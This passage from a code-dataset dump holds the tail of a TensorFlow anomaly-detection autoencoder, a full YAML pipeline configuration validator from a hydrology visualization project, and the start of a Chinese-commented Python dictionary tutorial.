\"\"\"\n\n # input type must be tf.float\n norm_x = tf.norm(x, ord='euclidean', axis=1)\n norm_x_re = tf.norm(x_re, ord='euclidean', axis=1)\n dist_x = tf.norm(x - x_re, axis=1)\n dot_x = tf.reduce_sum(x*x_re, axis=1)\n\n min_val = 1e-3\n loss_E = dist_x / (norm_x + min_val)\n loss_C = 0.5 * (1.0 - dot_x / (norm_x * norm_x_re + min_val))\n return tf.concat([loss_E[:, None], loss_C[:, None]], axis=1)\n\n def extract_feature(self, x, x_re, z_c):\n z_r = self.loss_as_feature(x, x_re)\n return tf.concat([z_c, z_r], axis=1)\n\n def compress(self, x):\n \"\"\"convert input x to output z=[z_c,z_r]\n z is the input of the GMM algorithm\n It is composed of low dimensional representation, reconstruction error\n -------\n x : tf.Tensor shape : (n_samples, n_features)\n x_re : reconstructed x value\n -------\n z : tf.Tensor shape : (n_samples, n2 + 2)\n Result data\n Second dimension of this data is equal to\n sum of compressed representation size and\n number of loss function (=2)\n \"\"\"\n z_c = self.encoder(x)\n x_re = self.decoder(z_c)\n\n z = self.extract_feature(x, x_re, z_c)\n\n return z, x_re\n\n def reconstruction_error(self, x, x_re):\n return tf.reduce_mean(tf.reduce_sum(\n tf.square(x - x_re), axis=1), axis=0)\n\n\n# 데이터 형태에 맞는 방식으로 불가, 2차원에 입력에 맞춰진 형태\nx = tf.ones([32,180], dtype=tf.float32)\n\nmodel = CompressNet([60,30, 10, 1])\nz_c = model.encoder(x)\nz_c.shape\nx_re = model.decoder(z)\nx_re.shape\nmodel.compress(x)\n\n","repo_name":"Minsung-Jeong/anomaly","sub_path":"PycharmProjects/project22/tutorial/AnomalyDetection/NewDAGMM/compress_net.py","file_name":"compress_net.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23986413224","text":"import datetime\nimport isodate\nimport os\nimport re\nfrom platform import system as system_name\nfrom subprocess import call as system_call\nimport tempfile\n\nimport yaml\nimport voluptuous as v\n\nfrom aws_loosa.processing_pipeline.utils.extract_list_from_file import extract_list_from_file\nfrom aws_loosa.processing_pipeline.watcher import Watcher\nfrom aws_loosa.processing_pipeline.dataset import DataSet\nfrom aws_loosa.processing_pipeline.cli import consts\n\n\nclass PipelineConfigValidator(object):\n def __init__(self, config_fpath, ignore_envs=False):\n if not any(config_fpath.endswith(x) for x in ['.yml', '.yaml', '.YML', '.YAML']):\n raise ValueError(\"The file provided to the PipelineConfigManager constructor is not a YAML file.\")\n\n with open(config_fpath, 'r') as config_file:\n raw_content = config_file.read()\n self._config_fpath = os.path.abspath(config_fpath)\n self._raw_config_dict = yaml.load(raw_content, Loader=yaml.FullLoader)\n self._pipeline_name = self._get_pipeline_name()\n self._previous_dataset_count = 0\n self._current_dataset_count = 0\n self._subset_count = 0\n self._ignore_envs = ignore_envs\n\n @classmethod\n def _raise(cls, message):\n raise v.Invalid(message)\n\n def _get_pipeline_name(self):\n if consts.GLOBAL_NAME_KEY in self._raw_config_dict:\n name = self._raw_config_dict[consts.GLOBAL_NAME_KEY]\n else:\n name = 'pipeline{}'.format(datetime.datetime.now().strftime('%Y%m%d%H%M%S'))\n\n return name\n\n def _generate_dataset_name(self):\n if consts.DATASET_KEY in self._raw_config_dict:\n return self._pipeline_name\n else:\n self._previous_dataset_count = self._current_dataset_count\n self._current_dataset_count += 1\n return \"{}_dataset{}\".format(self._pipeline_name, self._current_dataset_count)\n\n def _generate_subset_name(self):\n if consts.DATASET_KEY in self._raw_config_dict:\n dataset_name = self._pipeline_name\n else:\n dataset_name = \"{}_dataset{}\".format(self._pipeline_name, self._current_dataset_count)\n\n if self._previous_dataset_count != self._current_dataset_count:\n self._subset_count = 0\n self._subset_count += 1\n\n return \"{}_subset{}\".format(dataset_name, self._subset_count)\n\n def _substitute_variables_in_string(self, string):\n if type(string) is not str:\n if string is None:\n return None\n self._raise(\"A string is required\")\n matches = set(re.findall('[$][^$]+[$]', string))\n new_string = string\n if not matches and '$' in string:\n print('WARNING: A \"$\" was found in the following string, but it did not have a matching opening or '\n f'closing \"$\":\\n{string}\\nIf you were trying to reference a variable, please add the missing \"$\".')\n for match in matches:\n var = match[1:-1]\n env_var = os.getenv(var)\n if env_var is not None:\n new_string = new_string.replace(match, env_var)\n elif consts.GLOBAL_VARS_KEY in self._raw_config_dict and var in self._raw_config_dict[consts.GLOBAL_VARS_KEY]: # noqa\n script_var = self._raw_config_dict[consts.GLOBAL_VARS_KEY][var]\n new_string = new_string.replace(match, script_var)\n else:\n if self._ignore_envs:\n print(f'WARNGING: The variable \"{var}\" was not found in the system envrionment variables nor in '\n 'the global->vars definition of the pipeline YAML file')\n else:\n self._raise('The variable \"{var}\" was not found in the system envrionment variables nor in the '\n 'global->vars definition of the pipeline YAML file')\n\n substr1 = '../' if '../' in new_string else '..\\\\'\n parent_dir_count = new_string.count(substr1)\n if parent_dir_count > 0:\n abs_path = os.path.dirname(self._config_fpath)\n for count in range(0, parent_dir_count):\n abs_path = os.path.dirname(abs_path)\n new_string = os.path.join(abs_path, new_string.split(substr1*parent_dir_count)[1])\n\n substr2 = './' if './' in new_string else '.\\\\'\n if substr2 in new_string:\n new_string = os.path.join(os.path.dirname(self._config_fpath), new_string.split(substr2)[1])\n\n return os.path.join(new_string)\n\n def validate_boolean(self, val):\n if not isinstance(val, bool):\n self._raise('value must be boolean')\n\n return repr(val)\n\n def validate_string(self, val):\n new_val = self._substitute_variables_in_string(val)\n\n return repr(new_val)\n\n def validate_variable(self, possible_string):\n if type(possible_string) is not str:\n return possible_string\n\n mod_string = self._substitute_variables_in_string(possible_string)\n parts = mod_string.split('?')\n num_parts = len(parts)\n\n if not os.path.isfile(parts[0]):\n new_val = possible_string\n else:\n fpath = parts[0]\n col = 0\n delimeter = ','\n header = True\n if num_parts == 2:\n params = parts[1].split('&')\n if len(params) > 3:\n self._raise('Only three parameters are recognized: \"col\", \"delimeter\", and \"header\"')\n for param in params:\n try:\n p_key, p_val = param.split('=')\n if p_key == 'col':\n col = int(p_val)\n elif p_key == 'delimeter':\n delimeter = p_val\n elif p_key == 'header':\n header = p_val.lower() == 'true'\n else:\n raise ValueError()\n except ValueError:\n self._raise('The parameters following the csv path must be formatted as follows: '\n '/path/to/file.csv?col=1&header=true&delimeter=\\t')\n\n new_val = extract_list_from_file(fpath, col, delimeter, header)\n\n return new_val\n\n def validate_file_path(self, fpath):\n if not fpath:\n return repr(None)\n mod_fpath = self._substitute_variables_in_string(fpath)\n if not os.path.isfile(mod_fpath):\n self._raise('The file \"{}\" does not exist'.format(mod_fpath))\n\n return repr(mod_fpath)\n\n def validate_process_arg(self, argument):\n if type(argument) is str:\n return self._substitute_variables_in_string(argument)\n else:\n return repr(argument)\n\n def validate_duration(self, duration):\n if not duration:\n valid_duration = None\n elif duration.lower() == consts.NONE:\n valid_duration = datetime.timedelta(0)\n elif duration == consts.ALL:\n valid_duration = Watcher.CACHE_ALL\n else:\n try:\n valid_duration = isodate.parse_duration(duration)\n except isodate.ISO8601Error:\n self._raise(\"{} does not match the ISO8601 Duration format\".format(duration))\n\n return repr(valid_duration)\n\n def validate_logstash_host(self, raw_host):\n \"\"\"\n Returns unmodified host if host (str) responds to a ping request.\n Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.\n \"\"\"\n host = raw_host\n if host is not None:\n host = self._substitute_variables_in_string(raw_host)\n if '://' in host:\n protocol = host.split('://')[0]\n self._raise(f'The host parameter should not contain the protocol (i.e. \"{protocol}\"). Please specify '\n 'the protocol with the \"protocol\" parameter.')\n\n mod_host = host.split(':')[0] if ':' in host else host\n\n # Ping command count option as function of OS\n param = '-n' if system_name().lower() == 'windows' else '-c'\n\n # Building the command. Ex: \"ping -c 1 google.com\"\n command = ['ping', param, '1', str(mod_host)]\n\n # Pinging\n with open(os.devnull, 'wb') as f:\n if system_call(command, stdout=f, stderr=f) != 0:\n print(f\"WARNING: The host {host} could not be pinged and thus may be invalid or unreachable on \"\n \"the current network.\")\n\n return repr(host)\n\n @classmethod\n def get_datetime_from_relative_time(cls, val):\n import operator\n new_val = None\n if '+' in val:\n parts = val.split('+')\n operation = operator.add\n elif '-' in val:\n parts = val.split('-')\n operation = operator.sub\n try:\n raw_start = parts[0].strip().lower()\n raw_duration = parts[1].strip().upper()\n\n if raw_start not in ['', 'now']:\n raise ValueError()\n\n duration = isodate.parse_duration(raw_duration)\n new_val = operation(datetime.datetime.utcnow(), duration)\n except Exception:\n cls._raise('When using relative times, follow the format: [now]+|-')\n\n return new_val\n\n def validate_start_time(self, val):\n try:\n if not val:\n new_val = None\n elif type(val) is datetime.datetime:\n new_val = val\n elif type(val) is str:\n mod_val = self._substitute_variables_in_string(val)\n if mod_val.lower() == consts.LATEST or mod_val.lower() == consts.NONE:\n new_val = None\n elif mod_val.lower().strip() == consts.NOW:\n new_val = datetime.datetime.utcnow()\n elif any(x in mod_val for x in ['+', '-']):\n new_val = self.get_datetime_from_relative_time(mod_val)\n else:\n raise Exception()\n else:\n raise Exception()\n except Exception:\n self._raise('The \"end\" value must be either a valid keyword (i.e. \"latest\" or \"none\"), a relative time of '\n 'the form [now]+|-, or a datetime string in the format YYYY-mm-ddTHH:MM:SSZ')\n\n return repr(new_val)\n\n def validate_end_time(self, val):\n try:\n if not val:\n new_val = None\n elif type(val) is datetime.datetime:\n new_val = val\n elif type(val) is str:\n mod_val = self._substitute_variables_in_string(val)\n if not mod_val or mod_val.lower() == consts.NONE:\n new_val = None\n elif mod_val.lower().strip() == consts.LATEST:\n new_val = Watcher.END_AT_LATEST\n elif any(x in mod_val for x in ['+', '-']):\n new_val = self.get_datetime_from_relative_time(mod_val)\n else:\n raise Exception()\n else:\n raise Exception()\n except Exception:\n self._raise('The \"end\" value must be either a valid keyword (i.e. \"latest\" or \"none\"), a relative time of '\n 'the form [now]+|-, or a datetime string in the format YYYY-mm-ddTHH:MM:SSZ')\n\n return repr(new_val)\n\n def validate_seed_times(self, vals):\n if not vals:\n return None\n\n valid_times = []\n for val in vals:\n new_val = val\n if type(val) == datetime.datetime:\n new_val = val\n elif not val or val.lower() == consts.NONE:\n new_val = None\n elif val.lower() == consts.LATEST:\n new_val = Watcher.END_AT_LATEST\n else:\n self._raise('The \"seed_time\" value must be either a valid keyword (i.e. \"latest\" or \"none\") or a '\n 'datetime string in the format YYYY-mm-ddTHH:MM:SSZ')\n\n valid_times.append(repr(new_val))\n\n return valid_times\n\n def validate_repeat_ref_time(self, val):\n try:\n if not val or str(val).lower() == consts.NOW or str(val).lower() == consts.NONE:\n return repr(None)\n else:\n if type(val) is int:\n if val > 23:\n return repr((datetime.datetime(1, 1, 1) + datetime.timedelta(seconds=val)).time())\n else:\n val = '{}:00:00'.format(str(val))\n return repr(datetime.datetime.strptime(val, '%H:%M:%S').time())\n except Exception as exc:\n self._raise(str(exc))\n\n def validate_skip(self, val):\n if val is None:\n new_val = val\n elif isinstance(val, list):\n new_val = []\n for item in val:\n try:\n dt_obj = isodate.parse_datetime(item)\n new_val.append(dt_obj)\n except Exception:\n try:\n dt_obj = isodate.parse_time(item)\n new_val.append(dt_obj)\n except Exception:\n self._raise(\"The skip parameter must be a list of valid ISO 8601 Times or Datetimes or the \"\n \"path to a python script.\")\n elif isinstance(val, str):\n return self.validate_file_path(val)\n else:\n self._raise(\"The skip parameter must be a list of valid ISO 8601 Times or Datetimes or the path to \"\n \"a python script.\")\n\n return repr(new_val)\n\n def validate_uris(self, val):\n validated_uris = {}\n if val is None:\n return repr(None)\n if isinstance(val, str):\n validated_uris[consts.URI_PRIMARY] = repr([self._substitute_variables_in_string(val)])\n validated_uris[consts.URI_FAILOVER] = repr([self._substitute_variables_in_string(val)])\n elif isinstance(val, list):\n main_uris_list = []\n failover_uris_list = []\n for uri in val:\n if isinstance(uri, dict):\n if consts.URI_PRIMARY not in uri or consts.URI_FAILOVER not in uri:\n self._raise(f'{consts.URI_PRIMARY} and {consts.URI_FAILOVER} key/value pairs must be included '\n 'in uris for failover capability')\n main_uris_list.append(self._substitute_variables_in_string(uri[consts.URI_PRIMARY]))\n failover_uris_list.append(self._substitute_variables_in_string(uri[consts.URI_FAILOVER]))\n else:\n main_uris_list.append(self._substitute_variables_in_string(uri))\n failover_uris_list.append(self._substitute_variables_in_string(uri))\n validated_uris[consts.URI_PRIMARY] = repr(main_uris_list)\n validated_uris[consts.URI_FAILOVER] = repr(failover_uris_list)\n else:\n self._raise('The \"uris\" value must either be a single string or a list of strings')\n\n return validated_uris\n\n def validate_log_level(self, val):\n if val not in consts.VALID_LEVELS:\n self._raise(consts.INVALID_LEVEL_ERROR)\n\n return repr(val)\n\n def validate_transfer_dataset(self, val):\n if not val:\n valid_val = DataSet.TRANSFER_ALL\n else:\n if val not in DataSet.TRANSFER_OPTIONS:\n try_val = self._substitute_variables_in_string(val)\n if not os.path.exists(try_val):\n self._raise(DataSet.INVALID_TRANSFER_OPTION_ERROR)\n else:\n valid_val = try_val\n else:\n valid_val = val\n\n return repr(valid_val)\n\n def validate_transfers_dir(self, val):\n if not val:\n return repr(None)\n else:\n return self.validate_string(val)\n\n def validate_credentials(self, raw_val):\n validated_credentials = {}\n valid_keys = [\n consts.DATASET_CREDENTIALS_ACCESS_KEY, consts.DATASET_CREDENTIALS_SECRET_KEY,\n consts.DATASET_CREDENTIALS_TOKEN_KEY\n ]\n if not isinstance(raw_val, dict):\n self._raise(\"The credentials attribute must be specified in dictionary form, with access_key, access_id, \"\n \"or token as the only valid keys\")\n if raw_val:\n validated_credentials = {}\n for key, val in raw_val.items():\n if key not in valid_keys:\n self._raise(\"The only valid keys of the credentials attribute are: access_key, access_id \"\n \"and/or token.\")\n if key in [consts.DATASET_CREDENTIALS_ACCESS_KEY, consts.DATASET_CREDENTIALS_SECRET_KEY]:\n validated_credentials[key] = self._substitute_variables_in_string(val)\n else:\n validated_credentials[key] = dict()\n for token_key, token_val in val.items():\n if isinstance(token_val, dict):\n validated_credentials[key][token_key] = dict()\n for token_key2, token_val2 in token_val.items():\n sub_vars = self._substitute_variables_in_string(token_val2)\n validated_credentials[key][token_key][token_key2] = sub_vars\n else:\n validated_credentials[key][token_key] = self._substitute_variables_in_string(token_val)\n\n return repr(validated_credentials)\n\n def validate_transfer_format(self, raw_val):\n valid_keys = ['find', 'replace']\n if isinstance(raw_val, dict):\n for key in raw_val:\n if key not in valid_keys:\n self._raise(f'The \"{key}\" key is not allowed in the transfer_format specification.')\n return raw_val\n else:\n return repr(raw_val)\n\n def validate_acceptable_uris_missing(self, raw_val):\n if not raw_val:\n return repr(None)\n\n if isinstance(raw_val, int):\n return raw_val\n\n if isinstance(raw_val, str):\n if raw_val[-1] == \"%\":\n percentage = float(raw_val.replace(\"%\", \"\"))\n if not 0 <= percentage <= 100:\n self._raise('Percentages must be between 0 and 100.')\n return repr(raw_val)\n\n if isinstance(raw_val, list) and any(isinstance(val, int) for val in raw_val):\n self._raise('If using a list, values must be a string. A single integer value or percentage may also be '\n 'used.')\n\n return self.validate_uris(raw_val)\n\n def get_validated_dict(self):\n # SCHEMAS\n _name_schema = v.Schema(lambda x: re.sub('[ ]+', '_', x.lower()))\n write_space = os.path.join(os.getenv(\"PIPELINE_WORKSPACE\") or tempfile.mkdtemp())\n\n _globals_schema = v.Schema({\n v.Optional(\n consts.GLOBAL_NAME_KEY,\n default=self._pipeline_name\n ): _name_schema,\n\n v.Optional(\n consts.GLOBAL_LOGGING_KEY,\n default={\n consts.GLOBAL_LOGGING_LEVEL_KEY: consts.INFO,\n consts.GLOBAL_LOGGING_DIRECTORY_KEY: os.path.join(write_space, 'logs')\n }\n ): v.Schema({\n v.Optional(\n consts.GLOBAL_LOGGING_LEVEL_KEY,\n default=consts.INFO\n ): v.Schema(self.validate_log_level),\n v.Optional(\n consts.GLOBAL_LOGGING_DIRECTORY_KEY,\n default=os.path.join(write_space, 'logs')\n ): v.Schema(self.validate_string),\n v.Optional(\n consts.GLOBAL_LOGGING_LOGSTASH_KEY,\n default=os.getenv(\"LOGSTASH_SOCKET\")\n ): v.Schema(self.validate_logstash_host),\n }),\n v.Optional(\n consts.GLOBAL_SWITCHBOARDS_KEY,\n default=os.path.join(write_space, 'switchboards', self._pipeline_name)\n ): v.Schema(self.validate_string),\n v.Optional(\n consts.GLOBAL_TRANSFERS_KEY,\n default=os.path.join(write_space, 'transfers')\n ): v.Schema(self.validate_string),\n v.Optional(consts.GLOBAL_VARS_KEY): v.Schema({v.Extra: str}),\n v.Optional(consts.GLOBAL_REQ_ENVS_KEY): v.Schema([str]),\n v.Optional(consts.DATASET_START_KEY, default=None): v.Schema(self.validate_start_time),\n v.Optional(consts.DATASET_STOP_KEY, default=None): v.Schema(self.validate_end_time),\n v.Optional(consts.DATASET_SEED_TIMES_KEY, default=None): v.Schema(self.validate_seed_times)\n })\n globals_dict = dict(self._raw_config_dict)\n\n if consts.DATASETS_KEY in globals_dict:\n del globals_dict[consts.DATASETS_KEY]\n if consts.DATASET_KEY in globals_dict:\n del globals_dict[consts.DATASET_KEY]\n if consts.PROCESSES_KEY in globals_dict:\n del globals_dict[consts.PROCESSES_KEY]\n if consts.PROCESS_KEY in globals_dict:\n del globals_dict[consts.PROCESS_KEY]\n\n self.globals = _globals_schema(globals_dict)\n\n _process_schema = {\n v.Required(consts.PROCESS_SCRIPT_KEY): v.Schema(self.validate_file_path),\n v.Optional(consts.PROCESS_ARGS_KEY, default=[]): v.Schema([self.validate_process_arg]),\n v.Optional(consts.PROCESS_INTERPRETER_KEY, default=None): v.Schema(self.validate_file_path),\n v.Optional(consts.PROCESS_INTERVAL_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.PROCESS_REPEAT_REF_TIME_KEY, default=None): v.Schema(self.validate_repeat_ref_time),\n v.Optional(consts.PROCESS_TIMEOUT_KEY, default=None): v.Schema(self.validate_duration)\n }\n _dataset_list_schema = {\n v.Required(consts.DATASET_URIS_KEY): v.Schema(self.validate_uris),\n v.Required(consts.DATASET_REPEAT_KEY): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_NAME_KEY, default=self._generate_dataset_name): _name_schema,\n v.Optional(consts.DATASET_VARIABLES_KEY, default={}): v.Schema({v.Extra: self.validate_variable}),\n v.Optional(consts.DATASET_WINDOW_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_WINDOW_STEP_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_REPEAT_REF_TIME_KEY, default=None): v.Schema(self.validate_repeat_ref_time),\n v.Optional(consts.DATASET_DELAY_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_EXPIRATION_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_EXPECT_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_SKIP_KEY, default=None): v.Schema(self.validate_skip),\n v.Optional(consts.DATASET_PING_KEY, default='PT3M'): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_FALLBACK_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_CACHE_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_MAX_SERVICE_LAG_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_TRANSFER_KEY, default=consts.ALL): v.Schema(self.validate_transfer_dataset),\n v.Optional(consts.DATASET_CLEAN_KEY, default=False): v.Schema(self.validate_boolean),\n v.Optional(\n consts.DATASET_TRANSFERS_KEY,\n default=eval(self.globals[consts.GLOBAL_TRANSFERS_KEY])\n ): v.Schema(self.validate_transfers_dir),\n\n v.Optional(consts.DATASET_TRANSFER_FORMAT_KEY, default=None): v.Schema(self.validate_transfer_format),\n v.Optional(\n consts.DATASET_CONCURRENT_TRANSFERS_KEY,\n default=Watcher.DEFAULT_MAX_CONCURRENT_TRANSFERS\n ): v.All(int, v.Range(min=1, max=100)),\n v.Optional(consts.DATASET_START_KEY, default=None): v.Schema(self.validate_start_time),\n v.Optional(consts.DATASET_STOP_KEY, default=None): v.Schema(self.validate_end_time),\n v.Optional(consts.DATASET_SEED_TIMES_KEY, default=None): v.Schema(self.validate_seed_times),\n v.Optional(consts.DATASET_CREDENTIALS_KEY, default={}): v.Schema(self.validate_credentials),\n v.Optional(\n consts.DATASET_ACCEPTABLE_URIS_MISSING_KEY,\n default={}\n ): v.Schema(self.validate_acceptable_uris_missing),\n v.Optional(consts.PROCESSES_KEY, default=[]): v.Schema([_process_schema]),\n v.Optional(consts.DATASET_SUBSETS_KEY, default=[]): v.Schema([{\n v.Optional(consts.DATASET_URIS_KEY, default=None): v.Schema(self.validate_uris),\n v.Optional(consts.DATASET_WINDOW_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_VARIABLES_KEY, default={}): v.Schema({v.Extra: self.validate_variable}),\n v.Optional(consts.PROCESSES_KEY, default=[]): v.Schema([_process_schema])\n }])\n }\n _dataset_single_schema = v.Schema({\n v.Required(consts.DATASET_URIS_KEY): v.Schema(self.validate_uris),\n v.Optional(consts.DATASET_REPEAT_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_NAME_KEY, default=self._generate_dataset_name): _name_schema,\n v.Optional(consts.DATASET_VARIABLES_KEY, default={}): v.Schema({v.Extra: self.validate_variable}),\n v.Optional(consts.DATASET_WINDOW_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_WINDOW_STEP_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_REPEAT_REF_TIME_KEY, default=None): v.Schema(self.validate_repeat_ref_time),\n v.Optional(consts.DATASET_DELAY_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_EXPIRATION_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_EXPECT_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_SKIP_KEY, default=None): v.Schema(self.validate_skip),\n v.Optional(consts.DATASET_PING_KEY, default='PT3M'): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_FETCH_TIMEOUT_KEY, default=60): v.Schema(int),\n v.Optional(consts.DATASET_FALLBACK_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_CACHE_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_MAX_SERVICE_LAG_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_TRANSFER_KEY, default=consts.ALL): v.Schema(self.validate_transfer_dataset),\n v.Optional(consts.DATASET_CLEAN_KEY, default=False): v.Schema(self.validate_boolean),\n v.Optional(consts.DATASET_TRANSFER_FORMAT_KEY, default=None): v.Schema(self.validate_transfer_format),\n v.Optional(consts.DATASET_CREDENTIALS_KEY, default={}): v.Schema(self.validate_credentials),\n\n v.Optional(\n consts.DATASET_TRANSFERS_KEY,\n default=eval(self.globals[consts.GLOBAL_TRANSFERS_KEY])\n ): v.Schema(self.validate_transfers_dir),\n\n v.Optional(\n consts.DATASET_CONCURRENT_TRANSFERS_KEY,\n default=Watcher.DEFAULT_MAX_CONCURRENT_TRANSFERS\n ): v.All(int, v.Range(min=1, max=100)),\n\n v.Optional(\n consts.DATASET_ACCEPTABLE_URIS_MISSING_KEY, default=None\n ): v.Schema(self.validate_acceptable_uris_missing)\n })\n\n _old_config_schema = v.Schema({\n v.Optional(\n consts.GLOBAL_NAME_KEY,\n default=self._pipeline_name\n ): _name_schema,\n\n v.Optional(\n consts.GLOBAL_LOGGING_KEY,\n default={\n consts.GLOBAL_LOGGING_LEVEL_KEY: consts.INFO,\n consts.GLOBAL_LOGGING_DIRECTORY_KEY: os.path.join(write_space, 'logs')\n }\n ): v.Schema({\n v.Optional(\n consts.GLOBAL_LOGGING_LEVEL_KEY,\n default=consts.INFO\n ): v.Schema(self.validate_log_level),\n\n v.Optional(\n consts.GLOBAL_LOGGING_DIRECTORY_KEY,\n default=os.path.join(write_space, 'logs')\n ): v.Schema(self.validate_string),\n\n v.Optional(\n consts.GLOBAL_LOGGING_LOGSTASH_KEY,\n default=os.getenv(\"LOGSTASH_SOCKET\")\n ): v.Schema(self.validate_logstash_host),\n }),\n\n v.Optional(\n consts.GLOBAL_SWITCHBOARDS_KEY,\n default=os.path.join(write_space, 'switchboards', self._pipeline_name)\n ): v.Schema(self.validate_string),\n\n v.Optional(\n consts.GLOBAL_TRANSFERS_KEY,\n default=os.path.join(write_space, 'transfers')\n ): v.Schema(self.validate_string),\n\n v.Optional(consts.GLOBAL_VARS_KEY): v.Schema({v.Extra: str}),\n v.Optional(consts.GLOBAL_REQ_ENVS_KEY): v.Schema([str]),\n v.Required(consts.DATASETS_KEY): v.Schema([_dataset_list_schema])\n })\n\n _new_config_schema = v.Schema({\n v.Optional(\n consts.GLOBAL_NAME_KEY,\n default=self._pipeline_name\n ): _name_schema,\n\n v.Optional(\n consts.GLOBAL_LOGGING_KEY,\n default={\n consts.GLOBAL_LOGGING_LEVEL_KEY: consts.INFO,\n consts.GLOBAL_LOGGING_DIRECTORY_KEY: os.path.join(write_space, 'logs')\n }\n ): v.Schema({\n v.Optional(\n consts.GLOBAL_LOGGING_LEVEL_KEY,\n default=consts.INFO\n ): v.Schema(self.validate_log_level),\n\n v.Optional(\n consts.GLOBAL_LOGGING_DIRECTORY_KEY,\n default=os.path.join(write_space, 'logs')\n ): v.Schema(self.validate_string),\n\n v.Optional(\n consts.GLOBAL_LOGGING_LOGSTASH_KEY,\n default=os.getenv(\"LOGSTASH_SOCKET\")\n ): v.Schema(self.validate_logstash_host),\n }),\n\n v.Optional(\n consts.GLOBAL_SWITCHBOARDS_KEY,\n default=os.path.join(write_space, 'switchboards', self._pipeline_name)\n ): v.Schema(self.validate_string),\n\n v.Optional(\n consts.GLOBAL_TRANSFERS_KEY,\n default=os.path.join(write_space, 'transfers')\n ): v.Schema(self.validate_string),\n\n v.Optional(consts.GLOBAL_VARS_KEY): v.Schema({v.Extra: str}),\n v.Optional(consts.GLOBAL_REQ_ENVS_KEY): v.Schema([str]),\n v.Optional(consts.DATASET_START_KEY, default=None): v.Schema(self.validate_start_time),\n v.Optional(consts.DATASET_STOP_KEY, default=None): v.Schema(self.validate_end_time),\n v.Optional(consts.DATASET_SEED_TIMES_KEY, default=None): v.Schema(self.validate_seed_times),\n v.Required(consts.DATASET_KEY): v.Schema(_dataset_single_schema),\n v.Optional(consts.PROCESS_KEY): v.Schema(_process_schema)\n })\n try:\n validated = _old_config_schema(self._raw_config_dict)\n except Exception as e1:\n try:\n validated = _new_config_schema(self._raw_config_dict)\n except Exception as e2:\n raise ValueError(\n \"Depending on which configuration you are going for, \"\n \"one of the following is wrong:\\n\"\n \"Combined Dataset/Process config: {}\\n\"\n \"Separated Process/Process config: {}\".format(e1, e2)\n )\n\n return validated\n","repo_name":"NOAA-OWP/hydrovis","sub_path":"Source/Visualizations/aws_loosa/processing_pipeline/cli/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":32656,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"41942338074","text":"# -*- coding: utf-8 -*- \r\n# @Author: Zhangxiawei \r\n# @Date: 2023-04-26 09:42:17 \r\n# @Email: myzhangxiawei@foxmail.com \r\n# @Last Modified time: 2023-04-26 11:43:23 \r\n\r\n# 1 一个简单的字典\r\nalien_0 = {'color': 'green', 'points': 5}\r\nprint(alien_0['color'])\r\nprint(alien_0['points'])\r\n\r\n# 2 使用字典,字典是一系列键值对,每个键都与一个值相关联,你可使用键来访问相关联的值\r\n# 2-1 访问字典中的值\r\nalien_0 = {'color': 'green'}\r\nprint(alien_0['color'])\r\nalien_0 = {'color': 'green', 'points': 5}\r\nnew_points = alien_0['points']\r\nprint(f\"You just earned {new_points} points!\")\r\n# 2-2 添加键值对\r\nalien_0 = {'color': 'green', 'points': 5}\r\nprint(alien_0)\r\nalien_0['x_position'] = 0\r\nalien_0['y_position'] = 25\r\nprint(alien_0)\r\n# 2-3 先创建一个空字典\r\nalien_0 = {}\r\nalien_0['color'] = 'green'\r\nalien_0['points'] = 5\r\nprint(alien_0)\r\n# 2-4 修改字典中的值\r\nalien_0 = {'color': 'green'}\r\nprint(f\"The alien is {alien_0['color']}.\")\r\nalien_0['color'] = 'yellow'\r\nprint(f\"The alien is now {alien_0['color']}.\")\r\n# 根据当前速度确定将外星人向右移动多远。\r\nalien_0 = {'x_position': 0, 'y_position': 25, 'speed': 'medium'}\r\nprint(f\"Original position: {alien_0['x_position']}\")\r\nif alien_0['speed'] == 'slow':\r\n x_increment = 1\r\nelif alien_0['speed'] == 'medium':\r\n x_increment = 2\r\nelse:\r\n x_increment = 3\r\nalien_0['x_position'] = alien_0['x_position'] + x_increment\r\nprint(f\"New position: {alien_0['x_position']}\")\r\n# 2-5 删除键值对\r\nalien_0 = {'color': 'green', 'points': 5}\r\nprint(alien_0)\r\ndel alien_0['points']\r\nprint(alien_0)\r\n# 2-6 由类似对象组成的字典\r\nfavorite_languages = {\r\n 'jen': 'python',\r\n 'sarah': 'c',\r\n 'edward': 'ruby',\r\n 'phil': 'python',\r\n}\r\nlanguage = favorite_languages['sarah'].title()\r\nprint(f\"Sarah's favorite language is {language}.\")\r\n# 2-7 使用 get() 来访问值,其中第一个参数用于指定键,是必不可少的;第二个参数为指定的\r\n# 键不存在时要返回的值,是可选的\r\nalien_0 = {'color': 'green', 'speed': 'slow'}\r\n# print(alien_0['points']) KeyError: 'points'\r\npoint_value = alien_0.get('points', 'No point value assigned.')\r\nprint(point_value)\r\n\r\n# 3 遍历字典\r\n# 3-1 遍历所有键值对\r\nuser_0 = {\r\n 'username': 'efermi',\r\n 